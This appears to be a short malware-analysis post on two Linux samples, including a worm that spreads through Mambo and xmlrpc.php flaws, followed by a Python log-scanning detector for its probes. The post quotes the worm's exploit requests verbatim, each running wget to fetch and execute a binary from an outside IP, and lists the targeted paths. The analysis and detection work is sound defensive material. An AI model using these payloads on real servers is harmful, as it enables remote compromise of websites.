
New Linux Malware

Two linux malware in zip.

session: infected: Backdoor.Linux.Keitan.c

derfig: infected: Net-Worm.Linux.Mare.e

lys.

Derfig

The Derfig binary seems to spread via Mambo and xmlrpc.php vulns.

Mambo exploit from bin:
/index2.php?option=com_content&do_pdf=1&id=1
GET %sindex2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%%20/tmp;wget%%20209.123.16.34/gicumz;chmod%%20744%%20gicumz;./gicumz;echo%%20YYY;echo| HTTP/1.1

xmlrpc.php vuln:
POST %s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269
test.method',''));echo '_begin_';echo `cd /tmp;wget 209.123.16.34/gicumz;chmod +x gicumz;./gicumz `;echo '_end_';exit;/*

It looks for these vulns in the following locations:
/cvs/
/articles/mambo/
/cvs/mambo/
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc/xmlrpc.php

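Detection logic for the probe patterns quoted above, as an added example (not part of the original post): it matches Apache Common Log Format lines against the Mambo mosConfig_absolute_path remote include and against POSTs to the listed xmlrpc.php paths, then flags sources that hit several of them. The sample log lines and IP addresses are constructed, not observed.

```python
import re

# Paths the Derfig binary probes, copied from the strings quoted above.
PROBED_PATHS = ["/cvs/", "/articles/mambo/", "/cvs/mambo/", "/blog/xmlrpc.php",
                "/blog/xmlsrv/xmlrpc.php", "/blogs/xmlsrv/xmlrpc.php", "/drupal/xmlrpc.php",
                "/phpgroupware/xmlrpc.php", "/wordpress/xmlrpc.php", "/xmlrpc/xmlrpc.php"]

# Apache Common Log Format: host ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
# The Mambo remote include: mosConfig_absolute_path pointing at a URL (raw or %-encoded colon)
MAMBO_RFI_RE = re.compile(r"mosConfig_absolute_path=https?(?:%3a|:)", re.IGNORECASE)

def classify_request(line):
    """Return a finding dict for a log line matching a Derfig probe pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, method, target, status = m.groups()
    path = target.split("?", 1)[0]
    if method == "GET" and path.endswith("index2.php") and MAMBO_RFI_RE.search(target):
        # High confidence: a URL in mosConfig_absolute_path is the include attempt itself.
        return {"src": src, "path": path, "status": status, "rule": "mambo-rfi", "confidence": "high"}
    if method == "POST" and path in PROBED_PATHS and path.endswith("xmlrpc.php"):
        # Low confidence alone: the injected body never reaches a CLF log, and pingbacks POST here too.
        return {"src": src, "path": path, "status": status, "rule": "xmlrpc-post", "confidence": "low"}
    return None

def scan(log_text):
    """Run classify_request over every line of an access log and keep the hits."""
    return [f for f in map(classify_request, log_text.splitlines()) if f]

def suspicious_sources(findings, min_paths=2):
    """Sources with a high-confidence hit, or that touched min_paths distinct probed paths (scanning)."""
    by_src = {}
    for f in findings:
        by_src.setdefault(f["src"], set()).add(f["path"])
    high = {f["src"] for f in findings if f["confidence"] == "high"}
    return high | {src for src, paths in by_src.items() if len(paths) >= min_paths}

# Constructed sample log (documentation IPs); the cmd value keeps only the worm's "echo YYY" marker.
SAMPLE_LOG = """\
198.51.100.5 - - [10/Jan/2006:12:00:01 +0000] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://203.0.113.9/cmd.gif?&cmd=echo%20YYY HTTP/1.1" 404 0
198.51.100.5 - - [10/Jan/2006:12:00:02 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 200 512
198.51.100.5 - - [10/Jan/2006:12:00:03 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 0
198.51.100.7 - - [10/Jan/2006:12:05:00 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 300
198.51.100.8 - - [10/Jan/2006:12:06:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 1024
"""
```

Because a CLF access log does not record the POST body, the xmlrpc.php hits are weak on their own; the test.method injection string quoted above can only be matched at a layer that sees request bodies, such as mod_security or a WAF.
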
Both of these binaries seem to have been built on Red Hat 9 systems (judging from the compiler version strings).